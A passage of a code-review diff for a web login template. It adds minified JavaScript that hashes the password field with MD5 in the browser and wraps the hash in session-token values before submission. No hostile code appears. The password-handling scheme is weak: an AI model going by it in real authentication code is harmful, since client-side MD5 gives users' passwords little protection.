F=0;F<k.length;F++){var x=k.charCodeAt(F);if(x<128){d+=String.fromCharCode(x)}else{if((x>127)&&(x<2048)){d+=String.fromCharCode((x>>6)|192);d+=String.fromCharCode((x&63)|128)}else{d+=String.fromCharCode((x>>12)|224);d+=String.fromCharCode(((x>>6)&63)|128);d+=String.fromCharCode((x&63)|128)}}}return d}var C=Array();var P,h,E,v,g,Y,X,W,V;var S=7,Q=12,N=17,M=22;var A=5,z=9,y=14,w=20;var o=4,m=11,l=16,j=23;var U=6,T=10,R=15,O=21;s=J(s);C=e(s);Y=1732584193;X=4023233417;W=2562383102;V=271733878;for(P=0;P<C.length;P+=16){h=Y;E=X;v=W;g=V;Y=u(Y,X,W,V,C[P+0],S,3614090360);V=u(V,Y,X,W,C[P+1],Q,3905402710);W=u(W,V,Y,X,C[P+2],N,606105819);X=u(X,W,V,Y,C[P+3],M,3250441966);Y=u(Y,X,W,V,C[P+4],S,4118548399);V=u(V,Y,X,W,C[P+5],Q,1200080426);W=u(W,V,Y,X,C[P+6],N,2821735955);X=u(X,W,V,Y,C[P+7],M,4249261313);Y=u(Y,X,W,V,C[P+8],S,1770035416);V=u(V,Y,X,W,C[P+9],Q,2336552879);W=u(W,V,Y,X,C[P+10],N,4294925233);X=u(X,W,V,Y,C[P+11],M,2304563134);Y=u(Y,X,W,V,C[P+12],S,1804603682);V=u(V,Y,X,W,C[P+13],Q,4254626195);W=u(W,V,Y,X,C[P+14],N,2792965006);X=u(X,W,V,Y,C[P+15],M,1236535329);Y=f(Y,X,W,V,C[P+1],A,4129170786);V=f(V,Y,X,W,C[P+6],z,3225465664);W=f(W,V,Y,X,C[P+11],y,643717713);X=f(X,W,V,Y,C[P+0],w,3921069994);Y=f(Y,X,W,V,C[P+5],A,3593408605);V=f(V,Y,X,W,C[P+10],z,38016083);W=f(W,V,Y,X,C[P+15],y,3634488961);X=f(X,W,V,Y,C[P+4],w,3889429448);Y=f(Y,X,W,V,C[P+9],A,568446438);V=f(V,Y,X,W,C[P+14],z,3275163606);W=f(W,V,Y,X,C[P+3],y,4107603335);X=f(X,W,V,Y,C[P+8],w,1163531501);Y=f(Y,X,W,V,C[P+13],A,2850285829);V=f(V,Y,X,W,C[P+2],z,4243563512);W=f(W,V,Y,X,C[P+7],y,1735328473);X=f(X,W,V,Y,C[P+12],w,2368359562);Y=D(Y,X,W,V,C[P+5],o,4294588738);V=D(V,Y,X,W,C[P+8],m,2272392833);W=D(W,V,Y,X,C[P+11],l,1839030562);X=D(X,W,V,Y,C[P+14],j,4259657740);Y=D(Y,X,W,V,C[P+1],o,2763975236);V=D(V,Y,X,W,C[P+4],m,1272893353);W=D(W,V,Y,X,C[P+7],l,4139469664);X=D(X,W,V,Y,C[P+10],j,3200236656);Y=D(Y,X,W,V,C[P+13],o,681279174);V=D(V,Y,X,W,C[P+0],m,3936430074);W=D(W,V,Y,X,C[P+3],l,3572445317);X=D(X,W,V,Y,C[P+6],j,76029189);Y=D(Y,X,W,V,C[P+9],o,3654602809);V=D(V,Y,X,W,C[P+12],m,3873151461);W=D(W,V,Y,X,C[P+15],l,530742520);X=D(X,W,V,Y,C[P+2],j,3299628645);Y=t(Y,X,W,V,C[P+0],U,4096336452);V=t(V,Y,X,W,C[P+7],T,1126891415);W=t(W,V,Y,X,C[P+14],R,2878612391);X=t(X,W,V,Y,C[P+5],O,4237533241);Y=t(Y,X,W,V,C[P+12],U,1700485571);V=t(V,Y,X,W,C[P+3],T,2399980690);W=t(W,V,Y,X,C[P+10],R,4293915773);X=t(X,W,V,Y,C[P+1],O,2240044497);Y=t(Y,X,W,V,C[P+8],U,1873313359);V=t(V,Y,X,W,C[P+15],T,4264355552);W=t(W,V,Y,X,C[P+6],R,2734768916);X=t(X,W,V,Y,C[P+13],O,1309151649);Y=t(Y,X,W,V,C[P+4],U,4149444226);V=t(V,Y,X,W,C[P+11],T,3174756917);W=t(W,V,Y,X,C[P+2],R,718787259);X=t(X,W,V,Y,C[P+9],O,3951481745);Y=K(Y,h);X=K(X,E);W=K(W,v);V=K(V,g)}var i=B(Y)+B(X)+B(W)+B(V);return i.toLowerCase()};$("#usrPwd").val(MD5($("#usrPwd").val()));}); 358 $("#usrPwd").on("change",function(){var MD5 = function(s){function L(k,d){return(k<<d)|(k>>>(32-d))}function K(G,k){var I,d,F,H,x;F=(G&2147483648);H=(k&2147483648);I=(G&1073741824);d=(k&1073741824);x=(G&1073741823)+(k&1073741823);if(I&d){return(x^2147483648^F^H)}if(I|d){if(x&1073741824){return(x^3221225472^F^H)}else{return(x^1073741824^F^H)}}else{return(x^F^H)}}function r(d,F,k){return(d&F)|((~d)&k)}function q(d,F,k){return(d&k)|(F&(~k))}function p(d,F,k){return(d^F^k)}function n(d,F,k){return(F^(d|(~k)))}function u(G,F,aa,Z,k,H,I){G=K(G,K(K(r(F,aa,Z),k),I));return K(L(G,H),F)}function f(G,F,aa,Z,k,H,I){G=K(G,K(K(q(F,aa,Z),k),I));return K(L(G,H),F)}function D(G,F,aa,Z,k,H,I){G=K(G,K(K(p(F,aa,Z),k),I));return K(L(G,H),F)}function t(G,F,aa,Z,k,H,I){G=K(G,K(K(n(F,aa,Z),k),I));return K(L(G,H),F)}function e(G){var Z;var F=G.length;var x=F+8;var k=(x-(x%64))/64;var I=(k+1)*16;var aa=Array(I-1);var d=0;var H=0;while(H<F){Z=(H-(H%4))/4;d=(H%4)*8;aa[Z]=(aa[Z]| (G.charCodeAt(H)<<d));H++}Z=(H-(H%4))/4;d=(H%4)*8;aa[Z]=aa[Z]|(128<<d);aa[I-2]=F<<3;aa[I-1]=F>>>29;return aa}function B(x){var k="",F="",G,d;for(d=0;d<=3;d++){G=(x>>>(d*8))&255;F="0"+G.toString(16);k=k+F.substr(F.length-2,2)}return k}function J(k){k=k.replace(/rn/g,"n");var d="";for(var F=0;F<k.length;F++){var x=k.charCodeAt(F);if(x<128){d+=String.fromCharCode(x)}else{if((x>127)&&(x<2048)){d+=String.fromCharCode((x>>6)|192);d+=String.fromCharCode((x&63)|128)}else{d+=String.fromCharCode((x>>12)|224);d+=String.fromCharCode(((x>>6)&63)|128);d+=String.fromCharCode((x&63)|128)}}}return d}var C=Array();var P,h,E,v,g,Y,X,W,V;var S=7,Q=12,N=17,M=22;var A=5,z=9,y=14,w=20;var o=4,m=11,l=16,j=23;var U=6,T=10,R=15,O=21;s=J(s);C=e(s);Y=1732584193;X=4023233417;W=2562383102;V=271733878;for(P=0;P<C.length;P+=16){h=Y;E=X;v=W;g=V;Y=u(Y,X,W,V,C[P+0],S,3614090360);V=u(V,Y,X,W,C[P+1],Q,3905402710);W=u(W,V,Y,X,C[P+2],N,606105819);X=u(X,W,V,Y,C[P+3],M,3250441966);Y=u(Y,X,W,V,C[P+4],S,4118548399);V=u(V,Y,X,W,C[P+5],Q,1200080426);W=u(W,V,Y,X,C[P+6],N,2821735955);X=u(X,W,V,Y,C[P+7],M,4249261313);Y=u(Y,X,W,V,C[P+8],S,1770035416);V=u(V,Y,X,W,C[P+9],Q,2336552879);W=u(W,V,Y,X,C[P+10],N,4294925233);X=u(X,W,V,Y,C[P+11],M,2304563134);Y=u(Y,X,W,V,C[P+12],S,1804603682);V=u(V,Y,X,W,C[P+13],Q,4254626195);W=u(W,V,Y,X,C[P+14],N,2792965006);X=u(X,W,V,Y,C[P+15],M,1236535329);Y=f(Y,X,W,V,C[P+1],A,4129170786);V=f(V,Y,X,W,C[P+6],z,3225465664);W=f(W,V,Y,X,C[P+11],y,643717713);X=f(X,W,V,Y,C[P+0],w,3921069994);Y=f(Y,X,W,V,C[P+5],A,3593408605);V=f(V,Y,X,W,C[P+10],z,38016083);W=f(W,V,Y,X,C[P+15],y,3634488961);X=f(X,W,V,Y,C[P+4],w,3889429448);Y=f(Y,X,W,V,C[P+9],A,568446438);V=f(V,Y,X,W,C[P+14],z,3275163606);W=f(W,V,Y,X,C[P+3],y,4107603335);X=f(X,W,V,Y,C[P+8],w,1163531501);Y=f(Y,X,W,V,C[P+13],A,2850285829);V=f(V,Y,X,W,C[P+2],z,4243563512);W=f(W,V,Y,X,C[P+7],y,1735328473);X=f(X,W,V,Y,C[P+12],w,2368359562);Y=D(Y,X,W,V,C[P+5],o,4294588738);V=D(V,Y,X,W,C[P+8],m,2272392833);W=D(W,V,Y,X,C[P+11],l,1839030562);X=D(X,W,V,Y,C[P+14],j,4259657740);Y=D(Y,X,W,V,C[P+1],o,2763975236);V=D(V,Y,X,W,C[P+4],m,1272893353);W=D(W,V,Y,X,C[P+7],l,4139469664);X=D(X,W,V,Y,C[P+10],j,3200236656);Y=D(Y,X,W,V,C[P+13],o,681279174);V=D(V,Y,X,W,C[P+0],m,3936430074);W=D(W,V,Y,X,C[P+3],l,3572445317);X=D(X,W,V,Y,C[P+6],j,76029189);Y=D(Y,X,W,V,C[P+9],o,3654602809);V=D(V,Y,X,W,C[P+12],m,3873151461);W=D(W,V,Y,X,C[P+15],l,530742520);X=D(X,W,V,Y,C[P+2],j,3299628645);Y=t(Y,X,W,V,C[P+0],U,4096336452);V=t(V,Y,X,W,C[P+7],T,1126891415);W=t(W,V,Y,X,C[P+14],R,2878612391);X=t(X,W,V,Y,C[P+5],O,4237533241);Y=t(Y,X,W,V,C[P+12],U,1700485571);V=t(V,Y,X,W,C[P+3],T,2399980690);W=t(W,V,Y,X,C[P+10],R,4293915773);X=t(X,W,V,Y,C[P+1],O,2240044497);Y=t(Y,X,W,V,C[P+8],U,1873313359);V=t(V,Y,X,W,C[P+15],T,4264355552);W=t(W,V,Y,X,C[P+6],R,2734768916);X=t(X,W,V,Y,C[P+13],O,1309151649);Y=t(Y,X,W,V,C[P+4],U,4149444226);V=t(V,Y,X,W,C[P+11],T,3174756917);W=t(W,V,Y,X,C[P+2],R,718787259);X=t(X,W,V,Y,C[P+9],O,3951481745);Y=K(Y,h);X=K(X,E);W=K(W,v);V=K(V,g)}var i=B(Y)+B(X)+B(W)+B(V);return i.toLowerCase()};
359 //$("#usrPwd").val(MD5($("#usrPwd").val()));
360 $("#usrPwd").val($("#ses_token_prev").val()+MD5($("#usrPwd").val())+$("#ses_token_end").val());
361
362 });
319 </script> 363 </script>
320 @include('layout.footer') 364 @include('layout.footer')
321 <?php 365 <?php
......
Styling with Markdown is supported
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!